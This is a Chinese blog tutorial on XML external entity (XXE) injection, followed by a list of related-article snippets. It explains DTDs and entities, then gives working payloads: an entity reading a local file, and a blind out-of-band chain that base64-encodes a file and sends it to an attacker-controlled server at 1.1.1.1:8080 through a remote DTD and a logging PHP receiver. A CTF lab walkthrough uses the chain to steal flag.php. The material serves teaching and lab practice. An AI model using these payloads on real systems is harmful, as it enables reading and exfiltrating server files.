XXE-实体注入

最新推荐文章于 2025-06-21 13:45:11 发布
最新推荐文章于 2025-06-21 13:45:11 发布
阅读量4.3k 收藏 3
点赞数 3
CC 4.0 BY-SA版权
分类专栏: Novice
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36618918/article/details/106690712

XXE介绍

XXE即外部实体,从安全角度理解为XML外部实体注入攻击
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

内部DTD声明:

<!DOCTYPE 根元素 [元素声明]>

实例:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to      (#PCDATA)>
<!ELEMENT from    (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body    (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

引用外部DTD声明:

<!DOCTYPE 根元素 SYSTEM "文件名">
或者
<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

实例:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

这是包含 DTD 的 “note.dtd” 文件:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
DTD实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
实体引用是对实体的引用。
实体可在内部或外部进行声明。

一个外部实体声明

语法:

<!ENTITY 实体名称 SYSTEM "URI/URL">

DTD 例子:

<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

XML 例子:

<author>&writer;&copyright;</author>

一个内部实体声明

语法:

<!ENTITY 实体名称 "实体的值">

DTD 例子:

<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

XML 例子:

<author>&writer;&copyright;</author>

实体又分为一般实体和参数实体:

一般实体的声明语法:

<!ENTITY 实体名 “实体内容“>

引用实体的方式:&实体名;

** 参数实体只能在DTD中使用,参数实体的声明格式:**

<!ENTITY % 实体名 “实体内容“>

引用实体的方式:%实体名;

一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 (😉。

简单XXE攻击payload:

<?php
$test='<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]><scan>&test;</scan>';
$obj=simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
print_r($obj);
?>

test是一个变量,里面是XML,访问读取了C盘的1.txt然后使用simplexml_load_string将其转换为对象打印出来

simplexml_load_string()函数

功能

把 XML 字符串载入对象中

语法

simplexml_load_string(_data,classname,options,ns,is_prefix_ );

第一个参数是xml语句,SimpleXMLElement是调用了SimpleXMlement这个类,然后LIBXML_NOET是代替实体,然后去调用文件c盘下1.txt。

在实战中后端语言解析了XML是不会输出读取内容的,我们需要一个类似接受平台的接收器,将XML读取的数据发送到接收平台,然后接受平台储存然后我们在接受平台上分析。先使用PHP伪协议读取文件:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/1.txt">

然后去调用 用来XXE的服务器中的一个xml文档文件:

<!ENTITY % remote SYSTEM "http://192.168.1.100/1.xml">

而这个XML写的内容如下:

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://1.1.1.1:8080/2.php?id=%file;'>">
%all;      //调用实体

1.XML文档会调用2.php文件并向id通过GET方式传入%file 读取的内容
而2.php的内容如下:

<?php file_put_contents("3.txt",$_GET['id'],FILE_APPEND);?>

2.php被调用后会将id传进来的参数即%file的内容写入到3.php中,我们就可以通过访问3.php得到我们想读取的内容;

靶场演示

在这里插入图片描述
进入XXE靶场(外部实体注入),我们发现了simplexml_load_string()函数,这里很可能有XXE漏洞,我们看下附件代码:
在这里插入图片描述
发现这里通过$poststr接收数据并将数据直接放入到simplexml_load_string()转换为对象,那这里是可以进行XXE的;
我们先构造出XXE的poc代码:
在这里插入图片描述

第三行是通过php伪协议去读取被攻击服务器下的flag.php文件内容(base64编码,方便数据传输)
第四行是通过外部实体声明加载攻击者服务器的1.xml文件
第五行调用外部实体remote
第六行调用外部实体send

1.xml文件内容如下:

<!ENTITY % all	
"<!ENTITY &#x25; send SYSTEM 'http://1.1.1.1:8080/xxe/2.php?id=%file;'>"
\>
%all;

调用2.php并传入参数
2.php内容如下:

<?php file_put_contents("3.txt",$_GET['id'],FILE_APPEND);?>

将传参的内容,即读取到的文件写入放到3.txt中,成功读取文件
抓包,通过POST方式上传
在这里插入图片描述
访问自己用来接收的服务器,看看3.txt是否收到读取的文件
在这里插入图片描述
成功读取到文件,因为之前对其进行base64编码,所以进行base64解码即可得到原来的内容!

web渗透--25--XXE外部实体注入
武天旭的博客
09-16 1463
1、漏洞描述: XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念。实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容。如果在这个过程中引入了“污染”源,在对XML文档处理后则可能导致...
用友 GRP-U8 Proxy XXE-SQL注入漏洞
李火火的安全圈
10-09 3790
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
xxe实体注入
qq_42307546的博客
01-25 1635
XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入 由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞,那么重点看下能引用哪些类型的外部实体。当 libXML <libxml2.9 才会造成外部注入漏洞。 XXE漏洞代码分析 &l
超全XXE注入漏洞实验总结,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
06-21 1054
想要用XXE漏洞搞SSRF,你需要把外部XML实体定义成你要攻击的URL,然后在数据值里使用这个实体。如果应用的响应里能返回你定义的实体,那你就能从响应里看到URL的返回内容,实现和后端系统的双向交互。所以,想要系统地测试XXE漏洞,你可能需要一个一个地测试XML里的每个数据节点,看看哪个会把你的实体内容显示出来。盲XXE漏洞就是应用存在XXE注入,但是不会在响应里返回任何你定义的外部实体的值。文件里包含的换行符。也就是说,应用不会在响应里返回任何你定义的外部实体的值,所以你没法直接读取服务器上的文件。
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 3179
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
XXE 实体注入
guishengyx的博客
04-27 323
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
XXE - 实体注入
qq_58000413的博客
10-04 649
只是一个名字而已。XML像HTML、传输数据、无预定义(预先定义好的东西)
XXE实体注入XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2198
XXE实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
xxe-xml外部实体注入
nigo134的博客
07-27 3173
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
4. **数据注入**:通过XML实体注入,将服务器端计算结果暴露给攻击者。 **四、XXE防范措施** 1. **禁用外部实体**:在XML解析器配置中禁用或限制外部实体加载。 2. **验证输入**:对所有XML输入进行严格的验证和...
xxe-lab-master靶场下载安装包
09-10
XXE(XML External Entity)注入是一种攻击技术,它利用了XML解析器的漏洞,通过XML中的外部实体功能来读取或访问服务器上的文件、执行远程请求等。XXE攻击通常发生在Web应用中,当应用解析用户提供的XML数据时,...
[Web漏洞原理解析]XXE——XML实体注入
slismy的博客
01-23 342
白话Web漏洞 Author:Bell0ne_ XXE-实体注入一、XML是什么?二、使用步骤1.引入库2.读入数据总结 一、XML是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warni
XXE实体注入
qq_33557485的博客
05-05 442
1.XXE原理 XML被设计用来传输和存储数据。所以在网站中可以使用XML来读取或者写入数据。 如果用户可以控制XML代码,既可以利用XML读取任意文件。 2.php相关漏洞 php中有个函数:simplexml_load_string()。这个函数是将XML转化为对象,然后在php中使用。 3.注入小技巧 很多时候注入都是没有回显的,对于这类XXE来说,可以用XML将目标读取出来,然后...
XXE实体注入(超详细!)
热门推荐
qq_45300786的博客
09-06 1万+
可以把它理解为txt,就是存储文件的, 读取并调用出来,这是最核心的 将你的代码当成XXE代码,然后XXE再交给PHP去执行 将1.txt的东西,放入test这个变量 实体就是变量 &test就是输出这个变量 <scan></scan>只是一个声明格式,随便写什么,就算写成<abc></abc>都可以,只要满足<x></x>格式就行 最主要的是访问的地址,file,http等协议都可以。 XXE:XML外部实体注入,原理:.
XXE注入
qq_51360929的博客
11-19 3885
XXE注入 1.什么是XML ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ​ XML一般用来进行文本的标记,传输,甚至在某些情况下可以建立小型数据库。简单来说,XML负责传输web应用的数据,可以在不兼容的系统中储存数据。 ​ 相比于用HTML中耗费大量时间来编辑动态的数据,XML可以兼容不同的系统,不同的程序都可以通过XML来访问数据。 2.XML的
XXE(外部实体注入)详解
2401_82576671的博客
01-23 2732
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
学习记录-xxe实体注入
SmileAndFun的博客
09-06 376
学习记录-xxe漏洞 注:本文仅用于学术交流,不用于其他用途 一、基础知识 1)xxe实质 也称外部实体注入,简单的讲就是将攻击者输入的代码作为xml语言注入,利用xml可以通过协议加载访问服务,通常情况下是需要将注入的数据外带出来,可以使用炮台,也可以自己搭建需要公网ip 2)炮台实质 对于xxe来讲就是讲数据外带出来,如php作为炮台一般是三个文件 1.xml文件,这个用于注入的时候写入去加载这个xml,里面预定义file实体然后讲file作为get传参带上去访问php,这里file实体实际是我们去访问
xxe-labs
04-02
### XXE漏洞的学习资源与实验环境 XML外部实体注入XXE, XML External Entity Injection)是一种常见的安全漏洞,攻击者可以通过该漏洞访问本地文件系统、执行远程代码或者发起拒绝服务攻击。以下是关于XXE漏洞的一些学习资源和在线实验室: #### 学习资源 1. **OWASP官方文档**: OWASP提供了详细的XXE漏洞介绍及其防御方法[^2]。这是了解XXE的基础资料之一。 ```markdown https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing ``` 2. **PortSwigger Web Security Academy**: PortSwigger提供了一个交互式的平台来练习各种Web安全漏洞,其中包括XXE漏洞的实践教程[^3]。 ```markdown https://portswigger.net/web-security/xxe ``` 3. **Acunetix Blog**: Acunetix博客深入探讨了XXE的工作原理以及如何利用它进行攻击[^4]。这是一篇适合中级读者的文章。 #### 实验室推荐 1. **Vulnversity by HackTheBox**: 这是一个免费的虚拟机镜像,其中包含了多个Web应用程序的安全挑战,包括XXE漏洞测试[^5]。 ```bash wget https://downloads.hackthebox.eu/Vulnversity.zip unzip Vulnversity.zip ``` 2. **PentesterLab**: PentesterLab 提供了一系列基于真实场景构建的小型应用案例研究,用户可以在这些环境中模拟并修复XXE漏洞[^6]。 3. **TryHackMe Rooms**: TryHackMe上也有专门针对XXE漏洞设计的任务房间,新手可以在这里通过实际操作加深理解[^7]。 #### 防御措施概述 为了防止XXE漏洞的发生,开发者应禁用解析器中的DTD处理功能,并验证所有输入数据是否符合预期格式[^8]。例如,在Java中可设置SAXParserFactory如下所示: ```java import javax.xml.parsers.SAXParserFactory; public class SecureXmlParser { public static void main(String[] args) throws Exception { SAXParserFactory factory = SAXParserFactory.newInstance(); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值